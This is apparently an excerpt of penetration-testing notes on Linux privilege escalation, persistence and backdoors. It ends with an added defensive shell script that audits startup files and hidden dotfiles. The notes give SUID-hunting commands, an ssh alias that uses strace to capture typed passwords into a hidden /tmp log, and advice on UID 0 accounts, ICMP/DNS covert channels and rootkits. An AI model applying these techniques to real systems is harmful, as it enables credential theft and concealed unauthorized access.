6.2.2. Persistence

6.2.2.1. Privilege Escalation

  • Kernel exploit (match the running kernel version exactly; a wrong build crashes the box)

  • Exploit a vulnerable service that runs as root

  • Abuse third-party services running with elevated rights (databases, agents, management tools)

  • Via an executable with the SUID attribute
    • Find executable files that may escalate privileges (compare the results against what is normal for the distribution; an unexpected SUID binary is the interesting one)

    • find / -perm /4000 -ls  (older findutils accepted "-perm +4000"; current versions reject it)

    • find / -perm -u=s -type f 2>/dev/null

    • find / -user root -perm -4000 -print 2>/dev/null

    • find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

  • Take advantage of root privileges already granted to the current user
    • sudo -l  (look for NOPASSWD entries, wildcards, and binaries that can spawn a shell or write files)

  • Exploit misconfigured cron jobs (a root job whose script, or a directory on the path to it, is writable by the current user, or that runs a command with an unsafe wildcard)

6.2.2.2. Self-start

  • /etc/init.d  (SysV init scripts; on systemd hosts also check /etc/systemd/system and ~/.config/systemd/user)

  • /etc/rc.d/rc.local  (runs as root at the end of boot where it is still supported)

  • ~/.bashrc  (runs at every interactive bash start, as that user)

  • ~/.zshrc  (same for zsh)

6.2.2.3. Backdoors

  • ssh backdoors
    • alias ssh='strace -o /tmp/.ssh.log -e read,write,connect -s 2048 ssh'
      (placed in the victim's shell rc file; the password typed into the real ssh client shows up in the logged read() calls)

    • Backdoor account (an extra UID 0 entry in /etc/passwd, or a key added to an existing account's authorized_keys)

  • Covert channels commonly used by backdoors
    • ICMP

    • DNS

  • ICMP backdoor (commands and results carried in echo request/reply payloads, so no TCP/UDP listener appears)

  • Port reuse: the backdoor shares a port already open for a legitimate service, so no new listening port shows up

  • Hidden files: names beginning with "." are omitted by a plain ls, so drop payloads and logs as dotfiles (as /tmp/.ssh.log above)

  • rootkit (user-space LD_PRELOAD hooks or a kernel module that hides processes, files and connections)
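A check for the self-start locations and the rc-file and hidden-file tricks in the two lists above, written from the defender's side. This is an added example and not part of the original notes; the list of startup files and the regular expressions are constructed and will need extending per host, and the sample rc file in the usage is made up to contain the alias from the ssh backdoor entry.

```bash
#!/bin/sh
# Hypothetical audit helpers for the self-start files and backdoor tricks above.
# Not from the original notes; the file list and patterns below are constructed.

# Files that run commands at boot or at every shell start (constructed list, extend per host).
STARTUP_FILES="/etc/rc.local /etc/rc.d/rc.local /etc/profile /root/.bashrc /root/.zshrc $HOME/.bashrc $HOME/.zshrc"

# rc_suspicious_lines FILE: print "lineno:line" for lines that
#   - alias ssh/sudo/su/passwd to something that calls strace, ltrace, script or tee
#   - redefine ssh/sudo/su/passwd as a shell function
#   - source a file from /tmp, /dev/shm or /var/tmp
#   - put /tmp, /dev/shm or /var/tmp on PATH
# Prints nothing (and succeeds) when FILE is absent or clean.
rc_suspicious_lines() {
    [ -r "$1" ] || return 0
    grep -En \
        -e '^[[:space:]]*alias[[:space:]]+(ssh|sudo|su|passwd)=.*(strace|ltrace|script|tee)' \
        -e '^[[:space:]]*(ssh|sudo|su|passwd)[[:space:]]*\(\)' \
        -e '^[[:space:]]*(\.|source)[[:space:]]+(/tmp|/dev/shm|/var/tmp)' \
        -e 'PATH=.*(/tmp|/dev/shm|/var/tmp)' \
        "$1" || :
    return 0
}

# hidden_files_in DIR: dotfiles and dot-directories up to two levels below DIR,
# the usual drop spots for logs such as /tmp/.ssh.log.
hidden_files_in() {
    find "$1" -mindepth 1 -maxdepth 2 -name '.*' 2>/dev/null
    return 0
}

# audit_startup: run both checks over the standard locations.
audit_startup() {
    for f in $STARTUP_FILES; do
        rc_suspicious_lines "$f" | sed "s|^|$f:|"
    done
    for d in /tmp /var/tmp /dev/shm; do
        hidden_files_in "$d"
    done
}

# Live run: ./audit_startup.sh --run
[ "${1:-}" = "--run" ] && audit_startup
```

Port reuse and rootkits are out of reach for a script like this: a backdoor sharing a legitimate service's port does not add a listener, and a rootkit hides itself from the very tools the script calls. For those, compare `ss -ltnp` and `ls` output against the same view from outside the host (a network scan, or the disk mounted from a clean system).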